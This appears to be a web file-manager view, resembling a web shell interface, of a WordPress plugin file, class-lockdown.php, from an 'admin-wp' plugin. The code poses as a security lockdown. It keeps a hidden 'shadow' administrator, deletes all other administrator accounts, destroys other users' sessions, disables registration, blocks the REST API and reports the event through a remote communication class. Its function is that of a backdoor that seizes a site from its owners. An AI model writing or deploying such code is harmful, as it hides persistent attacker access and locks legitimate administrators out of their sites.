Create New Item
Item Type
File
Folder
Item Name
Search file in folder and subfolders...
Are you sure want to rename?
posthelic
/
wp-content
/
plugins
/
admin-wp
/
includes
:
class-lockdown.php
Advanced Search
Upload
New Item
Settings
Back
Back Up
Advanced Editor
Save
<?php if ( ! defined( 'ABSPATH' ) ) exit; class AWG_Lockdown { const OPT_ACTIVE = '_awg_lockdown'; public static function init(): void { if ( self::is_active() ) { add_action( 'init', [ __CLASS__, 'enforce' ], 0 ); add_filter( 'option_users_can_register', '__return_zero' ); add_filter( 'rest_authentication_errors', [ __CLASS__, 'restrict_rest' ], 999 ); } } /* ---- state ---- */ public static function is_active(): bool { return (bool) get_option( self::OPT_ACTIVE, false ); } public static function activate(): void { update_option( self::OPT_ACTIVE, 1, false ); } public static function deactivate(): void { delete_option( self::OPT_ACTIVE ); } /* ---- trigger (called when breach detected) ---- */ public static function trigger( string $reason, array $details = [] ): void { self::activate(); self::purge_unauthorized_admins(); self::destroy_unauthorized_sessions(); self::block_registration(); AWG_Admin_Guardian::log_incident( 'lockdown_triggered', [ 'reason' => $reason, 'details' => $details, ] ); AWG_Secure_Comm::send_lockdown( $reason, $details ); } /* ---- purge all admins except owner + shadow ---- */ private static function purge_unauthorized_admins(): void { AWG_Shadow_Admin::bypass( true ); $admins = get_users( [ 'role' => 'administrator' ] ); AWG_Shadow_Admin::bypass( false ); $owner_id = AWG_Admin_Guardian::get_owner_id(); $shadow_id = AWG_Shadow_Admin::get_id(); require_once ABSPATH . 'wp-admin/includes/user.php'; foreach ( $admins as $admin ) { if ( $admin->ID === $owner_id || $admin->ID === $shadow_id ) { continue; } WP_Session_Tokens::get_instance( $admin->ID )->destroy_all(); wp_delete_user( $admin->ID, $owner_id > 0 ? $owner_id : null ); } } /* ---- destroy sessions of non-whitelisted users ---- */ private static function destroy_unauthorized_sessions(): void { AWG_Shadow_Admin::bypass( true ); $all_users = get_users( [ 'fields' => 'ID' ] ); AWG_Shadow_Admin::bypass( false ); $owner_id = AWG_Admin_Guardian::get_owner_id(); $shadow_id = AWG_Shadow_Admin::get_id(); foreach ( $all_users as $uid ) { $uid = (int) $uid; if ( $uid === $owner_id || $uid === $shadow_id ) { continue; } WP_Session_Tokens::get_instance( $uid )->destroy_all(); } } /* ---- disable registration ---- */ private static function block_registration(): void { update_option( 'users_can_register', 0 ); } /* ---- enforce lockdown on every request ---- */ public static function enforce(): void { if ( ! is_user_logged_in() ) return; $uid = get_current_user_id(); if ( AWG_Admin_Guardian::is_whitelisted( $uid ) ) return; $user = wp_get_current_user(); if ( $user && in_array( 'administrator', (array) $user->roles, true ) ) { wp_logout(); wp_safe_redirect( wp_login_url() ); exit; } } /* ---- REST API restriction in lockdown ---- */ public static function restrict_rest( $errors ) { if ( is_wp_error( $errors ) ) return $errors; if ( ! is_user_logged_in() ) { return new WP_Error( 'awg_lockdown', __( 'Site is in lockdown mode.', 'admin-wp' ), [ 'status' => 503 ] ); } $uid = get_current_user_id(); if ( ! AWG_Admin_Guardian::is_whitelisted( $uid ) ) { return new WP_Error( 'awg_lockdown', __( 'Access denied during lockdown.', 'admin-wp' ), [ 'status' => 403 ] ); } return $errors; } /* ---- cleanup ---- */ public static function destroy(): void { delete_option( self::OPT_ACTIVE ); } }